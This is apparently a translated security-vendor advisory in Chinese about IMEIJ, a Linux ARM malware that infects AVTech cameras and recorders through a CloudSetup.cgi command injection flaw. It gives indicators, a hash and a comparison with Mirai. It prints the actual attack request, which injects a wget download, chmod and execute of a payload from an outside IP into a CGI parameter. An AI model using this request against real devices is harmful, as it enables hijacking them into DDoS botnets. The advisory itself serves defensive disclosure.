攻擊 CGI 漏洞的新 Linux 惡意程式

 

長久以來,Linux 一直是企業平台與物聯網(IoT ,Internet of Thing)裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統,並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及,針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅,其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現,並且在 2016 年 10 月公開揭露。不過在此之前,Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 https://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點,它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上,前述網站指令會讓裝置下載惡意檔案,並且將檔案設定成可執行檔。

圖 1:IMEIJ 的感染流程。

AVTech 有許多連上網際網路的裝置都可能感染這個新的 Linux 惡意程式,包括:IP 攝影機、監視錄影設備,以及支援 AVTech 雲端服務的網路錄影機。一旦惡意程式安裝到裝置上,它就能蒐集裝置的系統資訊和網路活動資料。此外,它還可執行遠端駭客所下的指令,發動分散式阻斷服務攻擊 (DDoS)攻擊,然後自行停止。受感染的裝置還可能讓同一網路上的其他裝置陷入危險。

IMEIJ 有三個下載網址,分別位於兩家不同的 ISP:

  • hxxp://172.247.116.3:8080/Arm1
  • hxxp://172.247.116.21:85/Arm1
  • hxxp://192.154.108.2:8080/Arm1

以上 IP 都是屬於南韓的 ISP 所有。

根據 Search-Lab 指出,目前網際網路上可搜尋到的 AVTech 裝置數量超過 13 萬台,這些裝置都有可能成為這項攻擊的目標。此外,這些裝置還可能變成殭屍電腦,讓駭客發動大規模 DDoS 攻擊。如同大多數連網裝置一樣,這些受害裝置出廠時就缺乏足夠的安全性,而且無法直接監控。

IMEIJ 的 DDoS 攻擊能力或許會讓人聯想到 Mirai,但兩者之間有些差別:

MIRAI IMEIJ
受害裝置  多樣 AVTech
使用的連接埠 7547
5555
48101
39999
攻擊方式 經由猜測密碼的方式登入使用 BusyBox 軟體的裝置 駭客利用不安全的 CGI 程式來安裝 IMEIJ 惡意程式

IMEIJ 是最近發現的多個 ARM 平台 Linux 惡意程式之一。ARM 是物聯網和行動裝置廣泛採用的平台,也是駭客攻擊這類裝置必備的技能之一。近期發現的 Linux 惡意程式除了 IMEIJ 之外還有 Umbreon Rootkit (趨勢科技命名為 ELF_UMBREON) 以及 LuaBot (趨勢科技命名為 ELF_LUABOT)。

趨勢科技PC-cillin雲端版能有效防範這項威脅,在端點裝置上偵測惡意程式。若要保護連網的裝置,可採用趨勢科技 Home Network Security 來檢查路由器和連線裝置之間的網路流量。企業機構則可採用趨勢科技的Deep Discovery Inspector網路裝置來監控所有連接埠及 105 種以上的網路通訊協定以偵測進階威脅和針對性攻擊。

IMEIJ 的 SHA256 雜湊碼如下:

8040422762138d28aa411d8bb2307a93432416f72b292bf884fb7c7efde9f3f5

原文出處:New Linux Malware Exploits CGI Vulnerability 作者:Jeanne Jocson 和 Jennifer Gumban